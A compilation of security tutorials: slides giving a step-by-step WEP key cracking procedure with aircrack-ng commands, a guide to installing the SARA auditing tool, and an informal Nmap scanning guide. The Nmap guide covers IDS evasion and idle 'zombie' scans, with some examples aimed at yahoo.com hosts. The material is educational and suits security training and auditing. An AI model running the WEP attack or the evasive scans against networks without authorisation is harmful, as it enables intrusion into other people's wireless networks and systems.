WEP Key Cracking Demo

Disclaimer
This material is to provide information on WLAN
security risks and mitigation measure. It should not
be used for malicious intent. Unauthorized Access to
computer system is an offense.
The points made here are kept concise for the
purpose of presentation. If you require details of test
and implementation please refer to technical
references.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
History of WEP Cracking
• In 2001:
– RC4 Stream Cipher weakness discovered by Scott Fluhrer, Itsik Mantin,
and Adi Shamir
– Secret key can be recovered by collecting 4-6 millions of data packets
 Very Busy Network
– Known as FMS attack
• In 2004:
– Hacker KoReK improved the attack
– Collecting 0.5 to 2 millions of data packets Busy Network
– Known as KoReK attack
• In 2005:
– Another RC4 stream cipher in WEP implementation discovered by
Andreas Klein
– Collecting less data packets  Normal Wireless LAN traffic
– PTW attack is based on Klein’s idea
– Known as PTW attack

WEP Key Cracking Step
1. Setup Equipment
2. Find the target
3. Capture Data from Air
4. Wait
or
Make the Target Network Busy
5. Start Cracking from Captured Data
Equipment
• Computer
• Wireless LAN card supports
– Monitoring mode
– Packet injection
• Software
– Commercial tools available on Win32 platform
– Free tools on Linux
• BackTrack CD
Wireless LAN Card
• Atheros Chipset
– Support Windows & Linux
• List of Card with Atheros Chipset
http://atheros.rapla.net/

Process:
Capture Data from Air
• airmon-ng start wifi0 [channel #]
• wlanconfig ath0 destroy
• ifconfig ath1 up
• iwconfig ath1 mode Monitor channel
[channel #]
• airodump-ng -c [channel #] –bssid [BSSID]
–ivs -w cap ath1
Make the Target Network Busy
• aireplay-ng -1 0 -e [SSID] -a [BSSID] -h [Wifi
Card Mac Addr] ath1
• aireplay-ng -5 -b [BSSID] -h [Wifi Card Mac Addr]
ath1
• Wait … …
– Wait for a useful data packet for replay later
• packetforge-ng -0 -a [BSSID] -h [Wifi Card Mac
Addr] -k 255.255.255.255 -l 255.255.255.255 -y
frag*.xor -w arp-request
• aireplay-ng -2 -r arp-request ath1
Start Cracking from Capture Data
• aircrack-ng -n 64 -b [BSSID] cap.ivs

Countermeasure
• In Home & Small Scale Environment
– Using WPA/WPA2-PSK
– Good password
• Password cracking for WPA/WPA2 – PSK is
available
• Encryption Methods in WPA/WPA2
– TKIP: using RC4
– AES

Installing Security Auditor’s Research Assistant (SARA) in backtrack Linux

Install tcsh. Perl needs the csh shell to execute SARA
#wget http://mirror.muntinternet.net/pub/slackware/slackware_source/a/tcsh/tcsh-6.15.00.tar.bz2
#bunzip2 tcsh-6.15.00.tar.bz2
#tar xvf tcsh-6.15.00.tar
#cd tcsh-6.15.00
#./configure
#make
#make install
#ln -sf /usr/local/bin/tcsh /bin/csh

Download and install SARA
#wget http://www-arc.com/sara/downloads/sara-7.5.2.tgz
#tar xvzf sara-7.5.2.tgz
#cd sara-7.5.2
#./configure
#make
#make install

Add sara user
./add_user

Scan a host
./sara -a4 <ip.address>

Run SARA in daemon mode
./sara -D

Now browse to http://localhost:666

How to Use Nmap for Security scanning

A Simple Guide to Nmap Usage :-
What is Nmap? its short For Network Mapper. It is a free port scanner, released under GNU GPL. Written by Fyodor and with contributions from around the world. It is simple fast and very effective port scanners. It has gone under lots of changes and it is certainly the best one with more and more features added. Recent Addtion is Version Scanning which is very crusial against networks. It is the Port Scanner OF Choice. Infact Administrator’s, Hackers Crackers, Script Kiddies :P, and many more use it well it is released under GPL and was first written on linux. And a bit shocking thing about is that even microsoft has included it in its auditing tools list and recommends using nmap for scans. But a great tihng about Nmap is that lots of people have also put effort to port it to other platforms like Windows, BSD, MAC OS and it is sucessful so you can run it on any platform. isnt that fantastic. ? yeah it is. It supports many types of scans and diferent types of flags are used and results are also very brief and easy to interpret. Infact Its a Port Scanner Of Choice. And Millions Of them use it and let me tell you try and i am sure you will also become and Nmap Geek within sometime. Well now let me start Off With its Uses :-
Nmap Supports Different Types Of Scans, Enumerated Below :-
TCP Connect Scan : This is the simplest form of scanning. It connects to every open port on the target machine and lists the open ports, the idea behind this kind of scanning is simple if the port on the target machine is open and accepting connections the Connect() will succed and if the port is not listening it is considered as closed. For every unix user with less priviliges this is the default scanning option. It can be very usefull as it is fast as parellel scanning option can be used with TCP connect Scan. But this type of scanning has its own demerits like it can be easily detected and filtered, it also shows up lots of connection logs.
An example of this is :-
#nmap –sT 192.168.0.1
TCP SYN Scan : This type of scanning is also called as half open scanning, as a full TCP connection is not made to the target port on target machine. In this type of Scan first a SYN packet is send to the port which indicates the port as if a real connection is going to be established and if the port is open and listening it sends back a SYN|ACK which is the indication that the port is open and if we get the RST back with means that the port is not listening and it is closed and if we get SYN|ACK back we immediately send a RST packet back which closes down the connection. This type of scanning has an advantage that only a few systems monitor and log this type pof scan attempts. And a Demerit of this scanning technique is that you need to be root to form SYN packets.
An example of this is :-
#nmap –sS 192.168.0.1
TCP FIN Xmus and Null scans : Sometimes when it is not just enough to use SYN scans as it can be detected by packet filters when SYN packets are send to unlikely ports. And that’s why FIN and Xmus and Null all these scans are able to by pass these type of filtering, in the technique when FIN packet is send to a open port the open port ignores the packet and a closed port immidiately send back a RST packet which tells nmap which port is open and which is close, But this type of scanning has its own merits and demerits as it is not effective against Microsoft Platform, and infact when ever a FIN packet is send to any port it replys with RST, but this can be used to discover that this system is Microsoft Based. On the other hand it works fine with *nix Boxes.
An example of this is :-
#nmap –sF 192.168.0.1 <= This is FIN Scan
#nmap –sX 192.168.0.1 <= This is Xmus Scan
#nmap –sN 192.168.0.1 <= This is Null Scan.
Ping Scan : It is sometimes when you want to know which of the systems are up, and this is the most likely scan method to be used to determine systems which are up. This is done by sending ICMP echo packets to all the hosts specified and all those hosts that respond to these packets are up. But sometimes ICMP echo packets are blocked and so it fails in picking up systems that are alive. But infact our nmap is much more smarter in this respect and has a option which send TCP Ack packet to the target system by default this port is set to “80”, and if the system responds with a RST packet, this is an indication that the system is up and the third technique is a SYN packet is send and awating a RST or SYN | Ack packet which indicates the system is up.
An example of this is :-
#nmap –sP 192.168.0.1-255 <= Ping Scan
#nmap –PT80 192.168.0.1 <= TCP Ping Scan.
UDP Scan : This type of Scanning is used to determine which UDP ports are open on the target host. In this type of scanning 0 byte udp packet it send to all the specified ports on the taget machine and if we get ICMP unreacheable then the port is assumed to be closed or else it is considered as open. But to its demerit is that sometimes ISP’s often block these ports and so it sometimes throws incorrect results that the ports are open but infact it is not, so you need to be a bit more fortunate about these results.
An example of this is :-
#nmap –sU 192.168.0.1
Version Detection Scan : Recent Addition to Nmap is version detection, which determines the service running and the version number of the daemon running. It is really very useful as it shows up the versions and which can show the old and vulnerable daemons and this is where vulnerability scanners are used but nmap has done it by just Version detection technique, if you are really an nmap geek I doubt you need vulnerability scanners, in this type of scan a service fingerprint is made from the daemon which is compared to nmap’s database of fingerprints and when it matchs it is sure that what service is running.
An example of this is :-
#nmap –sV 192.168.0.1
Protocol Scan : This technique is used to know which IP protocols are supported on the targer host. This is done by sending raw ip packets to the host without any header of protocol and it is send to all the protocols on the target host.nmap probes for 256 protocol types and it is infact time consuming but it is useful somewhere or the other.
An example of this is :-
#nmap –sO 192.168.0.1
Ack Scan : This type of Scanning is used to map out firewall rulesets.It can detemine that the firewall is stateful or just a packe filter that blocks incoming SYN packets. In this type of scan an Ack packet is send to the port and if it replies with an RST it means it is unfiltered and it is open and if no reply is returned it is classified as filtered.
An example of this is :-
#nmap –sA 192.168.0.1
List Scan : This used to generate a list of IP addresses with out actually pinging or scanning them and also a DNS resolution is performed in this type of scan.
An example of this is :-
#nmap –sL yahoo.com
RPC Scan : This type of scan uses a number of portscanning techniques, it finds all the TCP and UDP ports found and floods them with SunRPC program with Null commands to determine if it is a RPC service or not, it also catches up version number also.
An example for this is :-
#nmap –sR 192.168.0.1
Idle Scan : This type of scan is truly blind Scan. Which means that no packet is send from your own ip address. Instead another host is used which is often called as a Zombie with is used to scan the target machine and determine the open ports on the target machine, this is done by predecting the sequence numbers of the zombie host and used that host to scan our target, and if the target machine checks the ip of the scanning party the ip of the Zombie machine will show up. But it is best suited to use this technique at late nights when the zombie is idle to get the best results. There is a very nice paper written on Idle scanning, you can get it from securityfocus, I don’t remember the link but u can search for it, and there is also an exclusive paper on idle scanning with nmap which u can get at insecure.org This type of scan also helps us to map out the trust releationship between hosts. With is crucial for Spoofing attacks.
An example of this is :-
#nmap –sI zombie.yahoo.com mail.yahoo.com
Window Scan : This type of scan is very similar to Ack Scanning. It is use to map out open closed ports, filtered unfiltered ports due to anomaly in TCP window size reporting by each different operating system. Majority of *Nix Operating systems are vulnerable.
An example of this is :-
#nmap –sW 192.168.0.1
Different Types of Flags used in Scanning :-
-P0 :- If this flag is used it is an indication that Pinging the host is prohibited and during scanning the host Pinging is disabled. This is useful in many cases as some of the servers ignore icmp echo requests, so the host is scanned without discovering it with ping. With this TCP Ack Scan can also be used here like this –PT80.
-PT :- This flag is used to determine which hosts are up. This is used when icmp echo reply packets are blocked. A TCP Ack packet is send to the target network and if the host reply’s with RST it is up or else it is down.
-PS :- This flag is uses SYN packets instead of Ack packets, but its limitations for packet constructing is only for root users. All the hosts that respond with RST or SYN|ACK the hosts are up and if nothing, then its assumed to be down.
-O :- This flag is used to identify the target operating system. This is done by comparing the already stored fingerprint database of nmap with that of the fingerprints genreated by the host. This technique also calculates the uptime of the computer, and also used to determine the TCP Sequence predectability
-f :- This flag is used to evade intrusion detection systems and packet filtering systems and by pass all the scans with SYN , FIN , NULL, XMUS options. Packets are broken into tiny packets which are hard to be detected by IDS and Packet filters to detect.
-v :- This flag indicates verbose output. It means that it will print all information whats going on during the scan, And it can used to times to get more information.
-p :- This flag is used specify the custom port numbers you want to scan.different ports can be seperated using commas, “,”.
An example for this is :-
#nmap –sT –p 21,23,80,139,6000 192.168.0.1
-F :- This flag is used for Fast scanning. When this flag is used the only ports specified in the nmap services file will be scanned. And this is what makes the scan very fast.
-M :- This flag is used to specify maximum number of sockets to be used for parallel scanning.
-T :- This flag is used to specify the timing policy for the scan. This type of scanning can be used to evade Intrusion detection systems and it can also be used to make the Intrusion detection systems to start shouting :D. There are 5 options of timings.
Paranoid :- This type is very slow and is very handy to evade IDS.
Sneaky :- This is a bit similar but waits only 15 seconds between sending packets.
Polite :- This type helps to ease the load on the network.
Nornal :- This type of scanning is the nornal scanning behaviour.
Aggressive :- This type is used to make the scan a bit more fast.
Insane :- This type is the most quickest scan, I triggers IDS’s.

Examples Of Scanning :-

#nmap –sS -v 192.168.0.1
#nmap –sT –v 192.168.0.1
#nmap –sS –sV -v 192.168.0.1
#nmap –sT –sV –v 192.168.0.1
#nmap –sT –sV –v –P0 192.168.0.1
#nmap –sP –v 192.168.0.1-255
#nmap –PT80 –vv 192.168.0.1-255
#nmap –sF –vv 192.168.0.1
#nmap –sO –sV 192.168.0.1
#nmap –sI –P0 zombie.myhost.com yourhost.com
#nmap –sT –sV –p 21,23,79,80 192.168.0.1
#nmap –sT –sV –T Paranoid 192.168.0.1
#nmap –sT –P0 –T Insane –M10 192.168.0.1
#nmap –sT –T5 –M1000 192.168.0.1